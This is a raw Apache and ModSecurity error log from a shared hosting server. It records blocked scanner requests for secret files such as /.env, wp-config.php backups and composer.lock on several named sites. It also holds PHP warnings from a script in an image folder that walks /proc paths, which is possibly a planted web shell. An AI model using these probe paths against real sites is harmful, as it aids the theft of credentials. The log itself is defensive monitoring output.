[Mon May 11 22:12:46.660837 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:46.894592 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:47.144645 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:47.370503 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:47.596818 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:47.826614 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:48.052749 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:48.279695 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:48.510321 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:48.763509 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:49.000457 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:49.233109 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:49.460742 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:49.688566 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:49.759558 2026] [security2:error] [pid 1606352:tid 1606425] [client 176.65.139.236:45600] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agI4QXo_DFxNSZVmaX3LIwAAAMY"]
[Mon May 11 22:12:49.759745 2026] [security2:error] [pid 1606352:tid 1606425] [client 176.65.139.236:45600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agI4QXo_DFxNSZVmaX3LIwAAAMY"]
[Mon May 11 22:12:49.759960 2026] [security2:error] [pid 1606352:tid 1606425] [client 176.65.139.236:45600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agI4QXo_DFxNSZVmaX3LIwAAAMY"]
[Mon May 11 22:12:49.893140 2026] [security2:error] [pid 1534836:tid 1534884] [client 176.65.139.235:52958] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agI4QdeaRXe5lR8y0ZOwnAAAAU0"]
[Mon May 11 22:12:49.893373 2026] [security2:error] [pid 1534836:tid 1534884] [client 176.65.139.235:52958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agI4QdeaRXe5lR8y0ZOwnAAAAU0"]
[Mon May 11 22:12:49.893615 2026] [security2:error] [pid 1534836:tid 1534884] [client 176.65.139.235:52958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agI4QdeaRXe5lR8y0ZOwnAAAAU0"]
[Mon May 11 22:12:50.230787 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:50.500268 2026] [:error] [pid 1588898:tid 1588901] [client 52.167.144.66:59224] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 22:12:50.518713 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:50.744261 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:50.970900 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:51.195983 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:51.421412 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:51.646694 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:51.872847 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:52.128746 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:52.353831 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:52.579148 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:52.805647 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:52.810913 2026] [security2:error] [pid 1605480:tid 1605540] [client 20.220.233.65:38284] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/wp-config.php.backup"] [unique_id "agI4RB2Cvzd_nyNfUm_6LAAAARI"]
[Mon May 11 22:12:52.811030 2026] [security2:error] [pid 1605480:tid 1605540] [client 20.220.233.65:38284] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/wp-config.php.backup"] [unique_id "agI4RB2Cvzd_nyNfUm_6LAAAARI"]
[Mon May 11 22:12:52.811219 2026] [security2:error] [pid 1605480:tid 1605540] [client 20.220.233.65:38284] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agI4RB2Cvzd_nyNfUm_6LAAAARI"]
[Mon May 11 22:12:53.033658 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:53.299187 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:53.545898 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:53.771379 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:53.999405 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:54.228764 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:54.456102 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:54.684183 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:54.913175 2026] [:error] [pid 1606352:tid 1606419] [client 40.77.167.7:31683] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 22:12:54.914374 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:55.141237 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:55.369636 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:55.595473 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:55.820418 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:56.049749 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:56.275347 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:56.505462 2026] [security2:error] [pid 1606352:tid 1606428] [client 43.159.145.153:57830] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-content/uploads/2017/05/Capture-flyer-salari"] [unique_id "agI4SHo_DFxNSZVmaX3LMAAAAMk"]
[Mon May 11 22:12:56.515816 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:56.768030 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:57.024379 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:57.258843 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:57.495014 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:57.741487 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:57.978008 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:58.215386 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:59.942977 2026] [security2:error] [pid 1605480:tid 1605540] [client 20.220.233.65:38284] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/backup.wp-config.php"] [unique_id "agI4Sx2Cvzd_nyNfUm_6SwAAARI"]
[Mon May 11 22:12:59.943143 2026] [security2:error] [pid 1605480:tid 1605540] [client 20.220.233.65:38284] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/backup.wp-config.php"] [unique_id "agI4Sx2Cvzd_nyNfUm_6SwAAARI"]
[Mon May 11 22:12:59.943359 2026] [security2:error] [pid 1605480:tid 1605540] [client 20.220.233.65:38284] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agI4Sx2Cvzd_nyNfUm_6SwAAARI"]
[Mon May 11 22:13:02.943043 2026] [security2:error] [pid 1590352:tid 1590401] [client 47.128.47.132:30806] ModSecurity: Warning. Matched phrase "/composer.lock" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.lock found within REQUEST_FILENAME: /composer.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/composer.lock"] [unique_id "agI4Tq1q0G_aXAqWauT2awAAAIk"]
[Mon May 11 22:13:02.943316 2026] [security2:error] [pid 1590352:tid 1590401] [client 47.128.47.132:30806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/composer.lock"] [unique_id "agI4Tq1q0G_aXAqWauT2awAAAIk"]
[Mon May 11 22:13:03.046526 2026] [security2:error] [pid 1590352:tid 1590401] [client 47.128.47.132:30806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI4Tq1q0G_aXAqWauT2awAAAIk"]
[Mon May 11 22:13:28.633590 2026] [authz_core:error] [pid 1605480:tid 1605527] [client 216.73.216.110:31580] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Silex/error_log
PHP Warning:  filesize(): stat failed for /proc/219/task/219/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/219/task/219/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/219/task/219/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/219/task/219/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/219/task/219/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/219/task/219/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:13:33.829560 2026] [security2:error] [pid 1601130:tid 1601174] [client 20.220.233.65:2521] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/new-wp-config.php"] [unique_id "agI4bXEgAO_835W6c1mSVQAAAFg"]
[Mon May 11 22:13:33.829737 2026] [security2:error] [pid 1601130:tid 1601174] [client 20.220.233.65:2521] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/new-wp-config.php"] [unique_id "agI4bXEgAO_835W6c1mSVQAAAFg"]
[Mon May 11 22:13:33.830000 2026] [security2:error] [pid 1601130:tid 1601174] [client 20.220.233.65:2521] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agI4bXEgAO_835W6c1mSVQAAAFg"]
[Mon May 11 22:14:05.248127 2026] [security2:error] [pid 1601130:tid 1601165] [client 5.255.118.168:42626] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.habilis.space"] [uri "/.env"] [unique_id "agI4jXEgAO_835W6c1mSeQAAAE8"]
[Mon May 11 22:14:05.248470 2026] [security2:error] [pid 1601130:tid 1601165] [client 5.255.118.168:42626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.habilis.space"] [uri "/.env"] [unique_id "agI4jXEgAO_835W6c1mSeQAAAE8"]
[Mon May 11 22:14:05.248703 2026] [security2:error] [pid 1601130:tid 1601165] [client 5.255.118.168:42626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.habilis.space"] [uri "/403.shtml"] [unique_id "agI4jXEgAO_835W6c1mSeQAAAE8"]
[Mon May 11 22:14:05.356673 2026] [security2:error] [pid 1606352:tid 1606424] [client 5.255.118.168:42660] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.habilis.space"] [uri "/app/.env"] [unique_id "agI4jXo_DFxNSZVmaX3LdwAAAMU"]
[Mon May 11 22:14:05.356914 2026] [security2:error] [pid 1606352:tid 1606424] [client 5.255.118.168:42660] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.habilis.space"] [uri "/app/.env"] [unique_id "agI4jXo_DFxNSZVmaX3LdwAAAMU"]
[Mon May 11 22:14:05.357666 2026] [security2:error] [pid 1606352:tid 1606424] [client 5.255.118.168:42660] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.habilis.space"] [uri "/403.shtml"] [unique_id "agI4jXo_DFxNSZVmaX3LdwAAAMU"]
[Mon May 11 22:14:05.359413 2026] [security2:error] [pid 1588898:tid 1588907] [client 5.255.118.168:42640] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.habilis.space"] [uri "/.env.local"] [unique_id "agI4jaFW67LJTsgN3jQIeAAAAAg"]
[Mon May 11 22:14:05.359588 2026] [security2:error] [pid 1588898:tid 1588907] [client 5.255.118.168:42640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.habilis.space"] [uri "/.env.local"] [unique_id "agI4jaFW67LJTsgN3jQIeAAAAAg"]
